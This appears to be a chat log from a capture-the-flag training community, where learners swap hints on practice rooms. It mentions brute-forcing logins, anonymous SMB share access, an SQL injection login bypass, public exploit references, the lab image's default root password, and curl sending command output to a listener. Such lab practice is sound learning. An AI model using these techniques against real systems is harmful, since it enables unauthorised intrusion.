i think it's more about trying to run curl to get the output of another command returned to a listener

guys

what is a binary ?

zthlinux explains it

I just want to have a better understanding of it because from the room learn linus's explanation I'm not clear

google linux what is a binary

ok

@stuck fractal you give tough love hey 😅

@lusty swan Nope, rule 13 exists

hello,how can i decode an base64 txt file - 5 times in python?

The room gives you basic pointers

Please attempt it first

i'm trying for a whille,i don't understand yet but ill try some more

Have you read the docs for the library like the rooms suggests?

i'm reading right now,tnx

HELLO

I M TURKY

IS THERE THAT CAN HELP ME?

Please ask your question and we can try.

is there any way to shell from my personal machine(while using openvpn), into the browser based kali image? I only ask because the browser based client is a little slow and being able to issue commands from my personal machine might make it easier

its mostly that I do not know the root password for the kali image

root:Tryh4ckm3

thank you

But you can do it without the VPN

using public ip?

The THM kali has a public IP that you're given

if so thats awesome

thanks

Change the password as soon as you get on the box.

will do, thanks for the help friend

Hello,

I am currently working on Linux Challenges and on Task 3 Question 5. I am stuck. I have looked with ||uname -a|| and also in ||/sys/ using find|| and I can not for the life of me find anywhere else the system information could be stored. Can someone please supply a hint on what the correct solution is?

The room has a hint included

I have looked at it. I then used ||uname -r|| and I then searched that response back with find and I have located some files in ||/var/ and /usr/|| but I cant see anything further from there within the directories or files. Am I on the right path with it?

There's *release or something similar

As the hint

yes that is the hint

So. Look for files with names that fit that pattern

Or google for files that contain system information and fit that pattern

Any hint on finding the service for HackPark Task 4 Q3? I've checked the logs in ||System Scheduler|| but that doesn't seem to be the answer

@robust nymph sc query lists services in windows

Much help thank you, the only command I found at first was net start

Linux challenges room . a hint would help.

@normal shoal what is another device that can be a system mount?

USB ??

I am stuck at Intro to x86-64 , anyone please help me ?

ahhh got it the place where the usb will be mounted

anyone ?

||is bruteforce the way to go for email access in Skynet room?||

am 8k passwords in lol

yes it is

right

the waiting game

but you need to find the password list first

there is a....

and the email

||milesdyson, is it the username?||

yes, you don't need to use rockyou

LOL

so i've wasted a large amount of time

lol yeah

enumerate harder

is the username the one i mentioned above?

it's pretty easy to find

is the username the one i mentioned above?
yeah, if i remember correctly

right, ||is the password list in the SMB shares? not trying to get any freebies, but i haven't been able to access any of them||

||using the command smbclient -L ////ip//anonymous -U root(also have tried anonymous, milesdyson, Administrator)||

right, ||is the password list in the SMB shares? not trying to get any freebies, but i haven't been able to access any of them||
@lean rover yes, it's there

don't specidy -U root

just smbclient //ip/anonymous

(keep password blank)

||ahhh! i was using the -L for no reason i guess

i checked the smbclient website

simple error of usage lol

legend!!!

😄

advent of christmas Christmas Challenge 2

anyone please?

I am stuck at Intro to x86-64 , anyone please help me ?
@lofty tangle this room looks interesting, can u share its code ?

password has changed in yotf machine .. is it like that in all machines?

no, it's only for YOTF

so i need to bf it all again ... k

yeah

np , any nudge on port 80 ?

still trying to find the right wordlist for that one 😦

try $ locate passwords.txt

i bet you got some's

though I probably don't have the right username

I have a ton of wordlists, that's not the problem

oh you tallking about the 80 sorry

yeah

I'm assuming the bruteforce shouldn't take more than 5 minutes

(i think bf is not needed in that part

)

||SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) is what I am using..... keeps failing to upload sendmail config,.. is this the right exploit?|| ||I found another one, but it's very unclear on how exactly it's supposed to be used||

Skynet room

there's no need to exploit the mail

just get access to one account and read emails

the email contains a password, no?

@glossy basin you did yotf?

I didn't really continue after web part

it isn't really 'my style' of boxes 😅

ha

the email contains the ||smb password, which i used to get the secret directory||

||NEVERMIND >:)||

@glossy basin cool, did you passed it ? (the http)?

Damn im really stuck on the intro to python challenge,
I know i have to import base64 library and use base64 decode.

I just dont know where to start

define your givens 🙂

then go from there

@glossy basin cool, did you passed it ? (the http)?
yeah i think so

any hints on room Inoculation.. I am stuck at the webhook
https://tryhackme.com/room/inoculation

||Stuck at the Cuppa CMS login, no exploits i have found have worked for me at all, and the default credentials also are not working, is brute force the right way to go using rockyou.txt or log1.txt? A hint in the right direction would be nice :D||SKYNET ROOM

||if this https://www.exploit-db.com/exploits/25971 is the exploit to use, could i get some direction on how exactly to use it? i just get 404 errors whenver i try and replace the target with the ip adress/secret directory||

Hi, anyone could help me with the radare final exam? I'm stuck, i just found something but didn't work as i expected and i don't understand why

whats the issue?

I got some strings but no one works as the pass

the string is being manipulated, you need to figure out how

Mmm, i saw the function where the string i enter is manipulated, but i dont understand it well, i'll try to look it again

try to enter some text and step through the progarm, see how it changes

I'll do it, thxs

Hey guys

Kinda stuck on the Avengers room

SELECT * FROM Users WHERE username = `admin` AND password = `' 1=1` 

on the webpage, I am trying to login with creds: admin

pass: ' 1=1

you need to make sure the rest of the SQL isn't executed

turn it into a comment

?

The room says nothing about that

does ' do that?

the rooms might need some extra research :3

ah

It should be specified ig

did you watch the video?

I just realised what people ave been to refering to as videos, I have a browser that blocks non YT videos

an extension

oops I guess

thanks

try to enter some text and step through the progarm, see how it changes
@spiral stag I just done it, right in front of my eyes, thxs!

Hello hello, any hints for the last question of the room intro to x86-64, I found the password within the s*****.*** file but it doesn't work ? Thanks 🙂

the crackme2?

yup

whats the issue?

@spiral stag Thanks for the tip, it helped a lot

+1

np!

I found the secret file that contains a password but it doesnt work as the final password, I must say Im a bit stuck ahah

the password you enter is being checked against the password in that file, but what you enter is being changed

you need to follow the code and see how it changes the pass

you might want to consider doing https://tryhackme.com/room/ccradare2 first

alright I'll check it out then, thanks a lot ! 🙂

Hello guys. Right now i am doing the Plethora room. And i got SUPER stack in Juice Shop flag! I have successfully answered every other question but in Juice Shop i can't find a clean way to get the flag. Can anyone help me? Thank you

||how to get bobs password for the final flag in|| Linux challenges room ||i know bob has read permission but were is the password to "su" to bob||

@normal shoal enumerate. Check out weird files and stuff

hi, could anyone give me a hint for the crackme1 in intro to x86-64 room

Disassemble the file with radar2 and give a look at the strings

@open storm , sorry i'm quite new to assembly and radare2, how would i go about viewing the strings?

The three first commands of task4

Thank you! @open storm

My pleasure

Hi Team, I am working on ICE machine, during exploiting phase creating a session is not possible I get Error --> Exploit completed, but no session was created.

Is there anything that am doing wrong ? am really sorry am just biginner

Probably your payload

But also could be a lot of things

I recommend moving to #room-help

am sorry , Understood Thanks

HackPack, done root but not able to find os version

actually looks like i am stuck in correct format expected by ques, help would be appreciated

oops its hackpark